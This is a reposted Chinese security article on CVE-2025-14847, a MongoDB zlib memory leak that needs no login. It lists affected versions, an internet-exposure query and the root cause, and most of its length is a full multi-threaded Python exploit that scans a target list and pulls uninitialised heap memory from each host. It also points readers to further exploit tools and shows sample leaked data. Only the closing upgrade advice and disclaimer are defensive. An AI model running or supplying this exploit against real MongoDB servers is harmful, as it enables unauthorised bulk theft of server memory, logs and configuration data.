CVE-2025-14847–MongoDBUnauthenticatedMemoryLeak

admin 2025-12-29 01:06:53 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: MongoDB存在严重漏洞CVE-2025-14847,未经认证者可利用zlib解压缩缺陷读取未初始化堆内存,泄露日志及配置等敏感信息。影响3.6至8.2.3等多个版本,CVSS评分8.7。建议立即升级至安全版本或禁用zlib压缩功能,并提供了检测脚本。 综合评分: 91 文章分类: 漏洞分析,漏洞预警,数据泄露,数据安全,漏洞POC


cover_image

CVE-2025-14847 – MongoDB Unauthenticated Memory Leak

原创

始终战斗的

东方隐侠安全团队

2025年12月27日 10:03 江苏

漏洞简介

MongoDB 是一种流行的开源 NoSQL 数据库,用于以灵活的、基于文档的格式存储和管理数据。它将数据存储为类似 JSON 的文档(称为 BSON),而不是像传统 SQL 数据库那样的表和行。这使得MongoDB能够适用于需可扩展性、高性能和灵活数据模型的现代应用程序。

近日,MongoDB 解决了一个高严重性漏洞,编号为 CVE-2025-14847(CVSS 评分 8.7)。

该漏洞允许攻击者通过数据库的 zlib 压缩处理在未经身份验证的情况下从服务器内存泄漏敏感数据。由于即使没有有效凭据,内存中的数据也可能会暴露,因此需要立即修补。

东方隐侠安全团队强烈建议尽快升级到安全版本。

影响版本

01

此缺陷影响以下 MongoDB 版本:

  • MongoDB 8.2.0 到 8.2.3

  • MongoDB 8.0.0 到 8.0.16

  • MongoDB 7.0.0 到 7.0.26

  • MongoDB 6.0.0 至 6.0.26

  • MongoDB 5.0.0 至 5.0.31

  • MongoDB 4.4.0 至 4.4.29

  • 所有 MongoDB Server v4.2 版本

  • 所有 MongoDB Server v4.0 版本

  • 所有 MongoDB Server v3.6 版本

版本 8.2.3、8.0.17、7.0.28、6.0.27、5.0.32 和 4.4.30 解决了该问题。

Fofa语句:app=”MongoDB-数据库”

目前公网可探测到1870065条匹配结果:

漏洞原理

02

该问题源于 MongoDB 的服务器如何实现 zlib 压缩协议标头,其中不匹配的长度字段导致响应中返回未初始化的堆内存。

通过通过网络向可访问的 MongoDB 实例发送特制请求,攻击者可以诱骗服务器以内存内容进行响应,其中可能包括先前处理的查询数据或其他缓存信息,从而可能会暴露敏感信息,而无需身份验证且利用复杂性较低。

MongoDB 的 zlib 消息解压缩中的一个缺陷会返回分配的缓冲区大小,而不是实际解压缩的数据长度。这允许攻击者通过以下方式读取未初始化的内存:

  1. 发送带有夸大的 uncompressedSize 声明的压缩消息
  2. MongoDB根据攻击者的声明分配了一个大的缓冲区
  3. zlib 将实际数据解压到缓冲区的开头
  4. 该错误导致 MongoDB 将整个缓冲区视为有效数据
  5. BSON解析从未初始化的内存中读取“字段名称”直到空字节

该漏洞利用膨胀的长度字段制作 BSON 文档。当服务器解析这些文档时,它会从未初始化的内存中读取字段名称,直到遇到空字节。不同偏移量的每个探针可能会泄漏不同的内存区域。

泄露的数据可能包括:

  • MongoDB 内部日志和状态
  • WiredTiger存储引擎配置
  • 系统/proc数据(meminfo、网络统计信息)
  • Docker 容器路径
  • 连接 UUID 和客户端 IP

漏洞利用

03

漏洞利用脚本如下:

#!/usr/bin/env python3

import socket
import struct
import zlib
import re
import argparse
import threading
import time
from typing import Tuple, List
from concurrent.futures import ThreadPoolExecutor, as_completed, TimeoutError
from tqdm import tqdm

# 全局锁,保证多线程下结果写入的线程安全
result_lock = threading.Lock()

def send_probe(host: str, port: int, doc_len: int, buffer_size: int, timeout: float = 2.0) -> bytes:
    """Send crafted BSON with inflated document length (添加超时控制)"""
    # Minimal BSON content - we lie about total length
    content = b'\x10a\x00\x01\x00\x00\x00'# int32 a=1
&nbsp; &nbsp; bson = struct.pack('<i', doc_len) + content

&nbsp; &nbsp;&nbsp;# Wrap in OP_MSG
&nbsp; &nbsp; op_msg = struct.pack('<I',&nbsp;0) +&nbsp;b'\x00'&nbsp;+ bson
&nbsp; &nbsp; compressed = zlib.compress(op_msg)

&nbsp; &nbsp;&nbsp;# OP_COMPRESSED with inflated buffer size (triggers the bug)
&nbsp; &nbsp; payload = struct.pack('<I',&nbsp;2013)&nbsp;# original opcode
&nbsp; &nbsp; payload += struct.pack('<i', buffer_size)&nbsp;# claimed uncompressed size
&nbsp; &nbsp; payload += struct.pack('B',&nbsp;2)&nbsp;# zlib
&nbsp; &nbsp; payload += compressed

&nbsp; &nbsp; header = struct.pack('<IIII',&nbsp;16&nbsp;+ len(payload),&nbsp;1,&nbsp;0,&nbsp;2012)

&nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp; sock = socket.socket()
&nbsp; &nbsp; &nbsp; &nbsp; sock.settimeout(timeout)
&nbsp; &nbsp; &nbsp; &nbsp; sock.connect((host, port))
&nbsp; &nbsp; &nbsp; &nbsp; sock.sendall(header + payload)

&nbsp; &nbsp; &nbsp; &nbsp; response =&nbsp;b''
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 缩短响应读取逻辑,避免长时间阻塞
&nbsp; &nbsp; &nbsp; &nbsp; start_time = time.time()
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;while&nbsp;len(response) <&nbsp;4or&nbsp;len(response) < struct.unpack('<I', response[:4])[0]:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;time.time() - start_time > timeout:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; chunk = sock.recv(4096)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;ifnot&nbsp;chunk:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; response += chunk
&nbsp; &nbsp; &nbsp; &nbsp; sock.close()
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;response
&nbsp; &nbsp;&nbsp;except&nbsp;Exception&nbsp;as&nbsp;e:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;returnb''

def&nbsp;extract_leaks(response: bytes)&nbsp;-> List[bytes]:
&nbsp; &nbsp;&nbsp;"""Extract leaked data from error response"""
&nbsp; &nbsp;&nbsp;if&nbsp;len(response) <&nbsp;25:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;[]

&nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp; msg_len = struct.unpack('<I', response[:4])[0]
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;struct.unpack('<I', response[12:16])[0] ==&nbsp;2012:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; raw = zlib.decompress(response[25:msg_len])
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; raw = response[16:msg_len]
&nbsp; &nbsp;&nbsp;except:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;[]

&nbsp; &nbsp; leaks = []
&nbsp; &nbsp;&nbsp;# Field names from BSON errors
&nbsp; &nbsp;&nbsp;for&nbsp;match&nbsp;in&nbsp;re.finditer(rb"field name '([^']*)'", raw):
&nbsp; &nbsp; &nbsp; &nbsp; data = match.group(1)
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;data&nbsp;and&nbsp;data&nbsp;notin&nbsp;[b'?',&nbsp;b'a',&nbsp;b'$db',&nbsp;b'ping']:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; leaks.append(data)
&nbsp; &nbsp;&nbsp;# Type bytes from unrecognized type errors
&nbsp; &nbsp;&nbsp;for&nbsp;match&nbsp;in&nbsp;re.finditer(rb"type (\d+)", raw):
&nbsp; &nbsp; &nbsp; &nbsp; leaks.append(bytes([int(match.group(1)) &&nbsp;0xFF]))

&nbsp; &nbsp;&nbsp;return&nbsp;leaks

def&nbsp;read_targets(file_path: str)&nbsp;-> List[Tuple[str, int]]:
&nbsp; &nbsp;&nbsp;"""读取targets.txt文件中的目标列表"""
&nbsp; &nbsp; targets = []
&nbsp; &nbsp; default_port =&nbsp;27017

&nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;open(file_path,&nbsp;'r', encoding='utf-8')&nbsp;as&nbsp;f:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;line_num, line&nbsp;in&nbsp;enumerate(f,&nbsp;1):
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; line = line.strip()
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;ifnot&nbsp;line&nbsp;or&nbsp;line.startswith('#'):
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;continue

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if':'in&nbsp;line:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; parts = line.split(':',&nbsp;1)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; host = parts[0].strip()
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; port = int(parts[1].strip())
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;ValueError:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tqdm.write(f"\n[!] 第{line_num}行端口格式错误,使用默认端口27017:&nbsp;{line}")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; port = default_port
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; host = line
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; port = default_port

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; targets.append((host, port))
&nbsp; &nbsp;&nbsp;except&nbsp;FileNotFoundError:
&nbsp; &nbsp; &nbsp; &nbsp; print(f"[!] 目标文件&nbsp;{file_path}&nbsp;不存在!")
&nbsp; &nbsp;&nbsp;except&nbsp;Exception&nbsp;as&nbsp;e:
&nbsp; &nbsp; &nbsp; &nbsp; print(f"[!] 读取目标文件出错:&nbsp;{e}")

&nbsp; &nbsp;&nbsp;return&nbsp;targets

def&nbsp;scan_target(host: str, port: int, min_offset: int, max_offset: int,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; step: int =&nbsp;100, timeout: float =&nbsp;10.0)&nbsp;-> Tuple[bool, str, int, int]:
&nbsp; &nbsp;&nbsp;"""
&nbsp; &nbsp; 扫描单个目标(优化版)
&nbsp; &nbsp; - step: 步长,减少循环次数
&nbsp; &nbsp; - timeout: 单目标扫描总超时
&nbsp; &nbsp; """
&nbsp; &nbsp; all_leaked = bytearray()
&nbsp; &nbsp; unique_leaks = set()
&nbsp; &nbsp; start_time = time.time()

&nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 1. 先快速检测是否存在漏洞(只扫前几个offset)
&nbsp; &nbsp; &nbsp; &nbsp; quick_check_offsets = [50,&nbsp;100,&nbsp;200,&nbsp;500]
&nbsp; &nbsp; &nbsp; &nbsp; has_vuln =&nbsp;False
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;doc_len&nbsp;in&nbsp;quick_check_offsets:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;time.time() - start_time > timeout:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; response = send_probe(host, port, doc_len, doc_len +&nbsp;500)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; leaks = extract_leaks(response)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;leaks:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; has_vuln =&nbsp;True
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 2. 只有快速检测发现漏洞,才进行完整扫描(带步长)
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;has_vuln:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;doc_len&nbsp;in&nbsp;range(min_offset, max_offset, step):
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;time.time() - start_time > timeout:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tqdm.write(f"\n[!]&nbsp;{host}:{port}&nbsp;扫描超时")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; response = send_probe(host, port, doc_len, doc_len +&nbsp;500)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; leaks = extract_leaks(response)

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;data&nbsp;in&nbsp;leaks:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;data&nbsp;notin&nbsp;unique_leaks:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; unique_leaks.add(data)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; all_leaked.extend(data)

&nbsp; &nbsp; &nbsp; &nbsp; leaked_bytes = len(all_leaked)
&nbsp; &nbsp; &nbsp; &nbsp; is_success = leaked_bytes >&nbsp;0
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;is_success, host, port, leaked_bytes
&nbsp; &nbsp;&nbsp;except&nbsp;Exception&nbsp;as&nbsp;e:
&nbsp; &nbsp; &nbsp; &nbsp; tqdm.write(f"\n[!]&nbsp;{host}:{port}&nbsp;扫描异常:&nbsp;{str(e)[:50]}")
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;returnFalse, host, port,&nbsp;0

def&nbsp;save_success_results(results: List[Tuple[str, int, int]], output_file: str):
&nbsp; &nbsp;&nbsp;"""保存成功的检测结果到文件"""
&nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;open(output_file,&nbsp;'w', encoding='utf-8')&nbsp;as&nbsp;f:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; f.write("# CVE-2025-14847 MongoDB Memory Leak 检测成功的目标\n")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; f.write("# 格式: IP:端口 - 泄露字节数\n")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; f.write("# ==============================================\n\n")

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;host, port, leaked_bytes&nbsp;in&nbsp;results:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; f.write(f"{host}:{port}&nbsp;- 泄露字节数:&nbsp;{leaked_bytes}\n")

&nbsp; &nbsp; &nbsp; &nbsp; print(f"\n[*] 成功结果已保存到:&nbsp;{output_file}")
&nbsp; &nbsp;&nbsp;except&nbsp;Exception&nbsp;as&nbsp;e:
&nbsp; &nbsp; &nbsp; &nbsp; print(f"\n[!] 保存结果文件出错:&nbsp;{e}")

def&nbsp;main():
&nbsp; &nbsp; parser = argparse.ArgumentParser(description='CVE-2025-14847 MongoDB Memory Leak (多线程批量版)')
&nbsp; &nbsp; parser.add_argument('--targets', default='targets.txt', help='目标文件路径 (默认: targets.txt)')
&nbsp; &nbsp; parser.add_argument('--min-offset', type=int, default=20, help='最小文档长度 (默认:20)')
&nbsp; &nbsp; parser.add_argument('--max-offset', type=int, default=1000, help='最大文档长度 (优化默认值:1000)')
&nbsp; &nbsp; parser.add_argument('--step', type=int, default=50, help='扫描步长 (默认:50,越大越快)')
&nbsp; &nbsp; parser.add_argument('--timeout', type=int, default=10, help='单目标扫描超时(秒) (默认:10)')
&nbsp; &nbsp; parser.add_argument('--output', default='CVE-2025-14847-succ.txt', help='成功结果保存文件')
&nbsp; &nbsp; parser.add_argument('--threads', type=int, default=20, help='扫描线程数 (默认:20)')
&nbsp; &nbsp; args = parser.parse_args()

&nbsp; &nbsp; print(f"[*] mongobleed - CVE-2025-14847 MongoDB Memory Leak (修复版)")
&nbsp; &nbsp; print(f"[*] 目标文件:&nbsp;{args.targets}&nbsp;| 线程数:&nbsp;{args.threads}&nbsp;| 超时:&nbsp;{args.timeout}s")
&nbsp; &nbsp; print(f"[*] 扫描范围:&nbsp;{args.min_offset}-{args.max_offset}&nbsp;(步长:{args.step})")
&nbsp; &nbsp; print(f"[*] 结果保存:&nbsp;{args.output}")
&nbsp; &nbsp; print("="*60)

&nbsp; &nbsp;&nbsp;# 读取目标列表
&nbsp; &nbsp; targets = read_targets(args.targets)
&nbsp; &nbsp;&nbsp;ifnot&nbsp;targets:
&nbsp; &nbsp; &nbsp; &nbsp; print("[!] 未读取到有效目标,程序退出")
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return

&nbsp; &nbsp; print(f"\n[*] 共读取到&nbsp;{len(targets)}&nbsp;个目标,开始多线程扫描...")

&nbsp; &nbsp;&nbsp;# 存储成功的结果
&nbsp; &nbsp; success_results = []

&nbsp; &nbsp;&nbsp;# 使用线程池进行多线程扫描,添加进度条
&nbsp; &nbsp;&nbsp;with&nbsp;ThreadPoolExecutor(max_workers=args.threads)&nbsp;as&nbsp;executor:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 提交所有任务
&nbsp; &nbsp; &nbsp; &nbsp; future_to_target = {}
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;host, port&nbsp;in&nbsp;targets:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; future = executor.submit(
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; scan_target,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; host, port,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; args.min_offset, args.max_offset,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; args.step, args.timeout
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; )
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; future_to_target[future] = (host, port)

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 创建进度条(设置动态刷新)
&nbsp; &nbsp; &nbsp; &nbsp; pbar = tqdm(
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; total=len(future_to_target),
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; desc="扫描进度",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; unit="目标",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ncols=80,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; dynamic_ncols=True,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; leave=True
&nbsp; &nbsp; &nbsp; &nbsp; )

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 处理完成的任务
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;future&nbsp;in&nbsp;as_completed(future_to_target, timeout=args.timeout*len(targets)):
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; target = future_to_target[future]
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 获取结果(带超时)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; is_success, host, port, leaked_bytes = future.result(timeout=5)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;is_success:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;with&nbsp;result_lock:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; success_results.append((host, port, leaked_bytes))
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tqdm.write(f"\n[+] 发现漏洞 ▶&nbsp;{host}:{port}&nbsp;| 泄露字节数:&nbsp;{leaked_bytes}")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tqdm.write(f"\n[-] 无漏洞 ▶&nbsp;{host}:{port}")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;TimeoutError:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tqdm.write(f"\n[!] 超时 ▶&nbsp;{target[0]}:{target[1]}")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception&nbsp;as&nbsp;e:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; tqdm.write(f"\n[!] 错误 ▶&nbsp;{target[0]}:{target[1]}&nbsp;|&nbsp;{str(e)[:30]}")
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;finally:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 强制更新进度条
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; pbar.update(1)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; pbar.refresh()

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 关闭进度条
&nbsp; &nbsp; &nbsp; &nbsp; pbar.close()

&nbsp; &nbsp;&nbsp;# 保存成功结果
&nbsp; &nbsp;&nbsp;if&nbsp;success_results:
&nbsp; &nbsp; &nbsp; &nbsp; save_success_results(success_results, args.output)
&nbsp; &nbsp; &nbsp; &nbsp; print(f"\n[✅] 扫描完成!共发现&nbsp;{len(success_results)}&nbsp;个易受攻击的目标")
&nbsp; &nbsp;&nbsp;else:
&nbsp; &nbsp; &nbsp; &nbsp; print("\n[ℹ️] 扫描完成!未发现易受攻击的目标")

if&nbsp;__name__ ==&nbsp;'__main__':
&nbsp; &nbsp; main()

少侠们可以在运行脚本时灵活配置max-offset,比如50000,可以先用上面提供的脚本找到存在漏洞的目标,然后针对漏洞目标进行全面的扫描。

直接使用https://github.com/joe-desimone/mongobleed/tree/main 进行内存读取即可。示例输出:

[*] mongobleed - CVE-2025-14847&nbsp;MongoDB Memory Leak
[*] Author: Joe Desimone - x.com/dez_
[*] Target: localhost:27017
[*] Scanning offsets&nbsp;20-50000

[+] offset=&nbsp;117&nbsp;len=&nbsp;39: ssions^\u0001�r��*YDr���
[+] offset=16582&nbsp;len=1552: MemAvailable:&nbsp;8554792&nbsp;kB\nBuffers: ...
[+] offset=18731&nbsp;len=3908: Recv SyncookiesFailed EmbryonicRsts ...

[*] Total leaked:&nbsp;8748&nbsp;bytes
[*] Unique fragments:&nbsp;42
[*] Saved to: leaked.bin

其他漏洞利用项目:https://github.com/onewinner/CVE-2025-14847

漏洞环境搭建:https://github.com/ProbiusOfficial/CVE-2025-14847

防护手段

04

用户应立即升级8.2.3、8.0.17、7.0.28、6.0.27、5.0.32和4.4.30等安全版本,或更新版本

如果无法升级,请通过配置压缩选项以忽略 zlib 来禁用 MongoDB 上的 zlib 压缩。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:东方隐侠安全团队 始终战斗的《CVE-2025-14847 – MongoDB Unauthenticated Memory Leak》

评论:0   参与:  0